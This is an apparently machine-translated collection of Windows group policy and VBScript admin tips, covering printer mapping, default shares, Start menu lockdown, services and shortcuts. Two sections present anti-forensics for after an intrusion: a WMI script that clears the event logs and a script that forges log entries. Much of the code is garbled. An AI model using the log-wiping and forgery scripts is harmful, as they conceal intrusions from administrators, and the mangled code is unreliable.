Windows. grouppolicy

Include all the policies and scripts related to the network. If you find any omissions or errors during reading, please help us to correct them. Thank you very much!

Directory:

001 automatic distribution of printers using group policies and scripts
002. Unlock the Registry Editor
003. Disable default sharing of Win NT/2000.
004. display the local IP Address
005 using Script Programming to delete logs
006. use scripts to forge logs
007. Disable the Start menu option
008 execute external programs
Restart the specified IIS service
010. Protection against malicious vbs scripts
011. Similar to send to, send "shortcut" to the specified directory

Automatic distribution of printers using group policies and scripts

1. Save the following text as a vbs file and put it in a valid shared folder.

Set wshnetwork = Createobject ("wscript. Network ")
Wshnetwork. addwindowsprinterconnection "// 192.168.0.112/lbp-1210"
Wshnetwork. setdefaprinprinter "// 192.168.0.112/lbp-1210"
Wshnetwork. addwindowsprinterconnection "// 192.168.0.112/Canon laser shot LBP-1210 (new )"

2: run user group policy-boot script-enter the complete UNC path of the script on the corresponding ou.

Unlock Registry Editor

Dim wsh
Set wsh = wscript. Createobject ("wscript. Shell ")'
Wsh. Popup ("unlock Registry Editor! ") 'The pop-up message" unlock Registry Editor! "is displayed !"
Wsh. regwrite "hkcu/software/Microsoft/Windows/CurrentVersion/policies/system/disableregistrytools", 0, "REG_DWORD"
'Unlock the Registry Editor
Wsh. Popup ("Registry unlocked successfully! ") 'The pop-up message" Registry unlocked successfully! "is displayed !"

Save the file as a. vbs extension. Double-click it when using it.

Disable default share for Win NT/2000

Dim wshshell 'defines Variables
Set wshshell = Createobject ("wscript. Shell") 'creates an object wshshell that can communicate with the operating system.
Dim FSO, DC
Set FSO = Createobject ("scripting. FileSystemObject") 'create a file system object
Set Dc = FSO. Drives get all drive letters
For each d in DC
Dim Str
Wshshell. Run ("net share" & D. driveletter & "$/Delete") 'disable hidden sharing of All Drives
Next
Wshshell. Run ("net share ADMIN $/Delete ")
Wshshell. Run ("net share IPC $/Delete") 'disable ADMIN $ and IPC $ pipeline sharing

Now, run cmd.exe and run the net share command to view the shares on your machine. Double-click stopshare. vbs and the window will pop up. Then enter the net share command in cmd. No sharing list is found at this time.

Display local IP addresses

In many cases, we need to know the IP address of the Local Machine. Although we can use various software, it is very convenient to use vbs scripts. Use NotePad to edit the following content: dim WS
Set Ws = Createobject ("mswinsock. Winsock ")
IPaddress = ws. localip
Msgbox "local IP =" & IPaddress

Save the preceding content as showip. vbs and double-click it to obtain the local IP address.

Use Script Programming to delete logs
After successful system intrusion, The first thing hackers do is to clear logs. If you remotely control the other machine on the GUI or log in from the terminal, deleting logs is not a difficult task, although logs are also run as a service, but unlike services such as HTTP and FTP, logs can be stopped and deleted in the command line, using net stop EventLog in the command line cannot be stopped, so some people think it is very difficult to delete the log in the command line. In fact, this is not the case, for example, the log can be deleted using the VMI in script programming, which is very simple and convenient. Source code: strcomputer = "."
Set ob1_miservice = GetObject ("winmgmts :"_
& "{Impersonationlevel = impersonate, (Backup )}! //"&_
Strcomputer & "/root/cimv2 ")
Dim mylogs (3)
Mylogs (1) = "application"
Mylogs (2) = "system"
Mylogs (3) = "security"
For each logs in mylogs
Set collogfiles = obw.miservice. execquery _
("Select * From win32_nteventlogfile where logfilename = '" & logs &"'")
For each objlogfile in collogfiles
Objlogfile. cleareventlog ()
Next
Next

Save the above Code as the cleanevent. vbs file. In the above Code, first obtain the object, and then use its cleareventlog () method to delete the log. Create an array, application, security, and system. You can add an array if there are other logs. Then, a for loop is used to delete each element in the array, that is, each log.

Use scripts to forge logs |
After deleting the log, any thoughtful administrator will immediately respond to the intrusion when facing the empty log, so a smart hacker will learn how to forge the log. Using EventLog in Script Programming to create logs is very simple. Please refer to the following code: Set Ws = wscript. Createobject ("wscript. Shell ")
WS. logevent 0, "Write log success" 'create a successful execution log

Save the above Code as createlog. vbs. This code is easy to understand. first obtain a shell object of wscript, and then use the logevent method of the shell object. Logevent usage: logevent eventtype, "Description" [, remote system], where eventtype is the log type. The following parameters can be used: 0 indicates successful execution, 1 indicates an execution error, 2 indicates a warning, 4 Information, 8 successful audits, 16 fault audits. So in the code above, change 0 to 1, 2, 4, 8, 16. The content in the quotation marks is the log description. One disadvantage of using this method to write logs is that the logs can only be written to application logs, and the log source can only be wsh, that is, Windows Scripting host. Therefore, it cannot be concealed, this is for your reference only.

Disable Start Menu OptionsDim changestartmenu
Set changestartmenu = wscript. Createobject ("wscript. Shell ")
Regpath = "hkcr/software/Microsoft/Windows/CurrentVersion/policies /"
Type_name = "REG_DWORD"
Key_data = 1

Startmenu_run = "norun"
Startmenu_find = "nofind"
Startmenu_close = "noclose"

Sub change (argument)
Changestartmenu. regwrite regpath & argument, key_data, type_name
Msgbox ("success! ")
End sub

Call change (startmenu_run) 'disables the "run" function in the "Start" menu.
Call change (startmenu_find) 'disables the "Search" function in the "Start" menu
Call change (startmenu_close) 'Disable the system function in the Start Menu.

Save the above Code as the changestartmenu. vbs file. Double-click it when using it.

Execute external programDim objshell
Set objshell = wscript. Createobject ("wscript. Shell ")
Ireturn = objshell. Run ("cmd.exe/C set Var = World", 1, true)

Save it as a. vbs file. In this Code, we first set an environment variable named "var" and" world". Users can replace "cmdcomspecizer" with "cmd.exe" and change the command "set Var = World" to other commands to run arbitrary commands.

Restart the specified IIS service.

Const ads_service_stopped = 1
Set objcomputer = GetObject ("winnt: // mycomputer, computer ")
Set objservice = objcomputer. GetObject ("service", "myservice ")
If (objservice. Status = ads_service_stopped) then
Objservice. Start
End if

Store it in the C root directory in the name of startsvc. vbs. Run the following command: cscript C:/startsvc. vbs. After running, the service item is re-enabled.

Malicious vbs script prevention
The execution of the vbs virus is inseparable from wsh, which brings convenience to people, while also leaving a chance for the spread of the virus. To prevent the vbs virus, you can uninstall wsh. Just open the control panel, find "Add/delete programs", and click "Windows Installer ", double-click the "attachment" item, and remove "√" of "Windows Scripting Host" in the window that appears, then, the wsh can be detached after "OK" twice in a row. Alternatively, you can click "my computer"> "View"> "Folder Options". In the displayed dialog box, click "file type ", then, you can delete vbs, VBE, JS, and JSE file extensions and application mappings to prevent vbs script viruses.

Similar to send to, send "shortcut" to the specified directory

Set unnamedarguments = wscript. Arguments. unnamed

Set wshshell = wscript. Createobject ("wscript. Shell ")
Set objfso = Createobject ("scripting. FileSystemObject ")

Strfolder = "C:/mytool /"
For Count = 0 to wscript. Arguments. Count-1 step 1
Filename = unnamedarguments. Item (count)
Set objfile = objfso. GetFile (filename)
Set oshelllink = wshshell. createshortcut (strfolder & objfso. getbasename (filename) & ". lnk ")
Oshelllink. targetpath = filename
Oshelllink. windowstyle = 1
'Oss link. iconlocation = "notepad.exe, 0"
'Oss link. Description = "shortcut script"
Oshelllink. workingdirectory = objfso. getparentfoldername (filename)
Oshelllink. Save
Next

The preceding code sends a program shortcut to the C:/mytool directory.

Collect Site Resources
· Http: // callof.net/site/list.asp? Id = 65 (many WMI-related resources)